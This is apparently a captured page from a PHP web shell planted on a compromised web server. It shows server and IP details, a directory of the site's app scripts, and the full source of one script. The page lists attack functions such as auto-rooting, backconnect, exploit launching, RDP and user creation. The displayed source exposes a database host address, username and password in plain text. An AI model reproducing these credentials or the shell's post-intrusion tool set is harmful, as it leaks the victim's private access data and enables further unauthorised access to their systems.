Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
apps /
[ HOME SHELL ]
Name
Size
Permission
Action
aryaSamajImages
[ DIR ]
drwxr-xr-x
bhajans
[ DIR ]
drwxr-xr-x
login
[ DIR ]
drwxr-xr-x
.ftpquota
11
B
-rw-r--r--
aryasamajws.php
3.1
KB
-rw-r--r--
aryasamajwslike.php
1.67
KB
-rw-r--r--
error_log
4.39
MB
-rw-r--r--
mservices.php
512
B
-rw-r--r--
new_sendmessage.php
2.46
KB
-rw-r--r--
new_sendmessage2.php
2.29
KB
-rw-r--r--
portscan.php
272
B
-rw-r--r--
sendmessage.php
2.89
KB
-rw-r--r--
sendmessage_aryasamaj.php
2.87
KB
-rw-r--r--
simplepush.php
1.52
KB
-rw-r--r--
storeregid1.php
729
B
-rw-r--r--
storetoken.php
870
B
-rw-r--r--
storetoken_aryasamaj.php
918
B
-rw-r--r--
tbl_info.php
511
B
-rw-r--r--
tbl_services.php
515
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aryasamajwslike.php
<?php mysql_connect("103.20.213.56","thearyas_asmaps1","arya@samaj@app") or die("not able to connect"); mysql_select_db("thearyas_asmapp") or die("db not accessible"); if(isset($_REQUEST['like']) && isset($_REQUEST['id'])) { if($_REQUEST['like']=='yes') { $id=intval($_REQUEST['id']); $selqry="select * from mp3table where id=$id"; $selres=mysql_query($selqry) or die(mysql_error()); $selrow=mysql_fetch_row($selres) or die(mysql_error()); $numlikes=$selrow[4]; $newnumlikes=$numlikes+1; $upqry="update mp3table set numlikes=$newnumlikes where id=$id"; mysql_query($upqry) or die(mysql_error()); echo "[{\"Result\":\"Liked\"}]"; } } elseif(isset($_REQUEST['count']) && isset($_REQUEST['id'])) { if($_REQUEST['count']=='yes') { $id=intval($_REQUEST['id']); $selqry="select * from mp3table where id=$id"; $selres=mysql_query($selqry) or die(mysql_error()); $selrow=mysql_fetch_row($selres) or die(mysql_error()); echo "[{\"Result\":\"$selrow[4]\"}]"; } } elseif(isset($_REQUEST['countsongs'])) { if($_REQUEST['countsongs']=='yes') { $selqry="select * from mp3table"; $selres=mysql_query($selqry) or die(mysql_error()); $numrows=mysql_num_rows($selres); echo "[{\"Result\":\"$numrows\"}]"; } } elseif(isset($_REQUEST['like'])) { if($_REQUEST['like']=='yes') { $selqry="select * from mp3table"; $selres=mysql_query($selqry) or die(mysql_error()); $numrows=mysql_num_rows($selres); $i=0; echo "["; while($selrow=mysql_fetch_row($selres)) { echo "{\"mp3id\":\"$selrow[0]\",\"likes\":\"$selrow[4]\"}"; if($i<($numrows-1)) echo ","; $i++; } echo "]"; } } else { echo "[{\"Result\":\"like request/count likes/count songs request/id missing\"}]"; } ?>
Close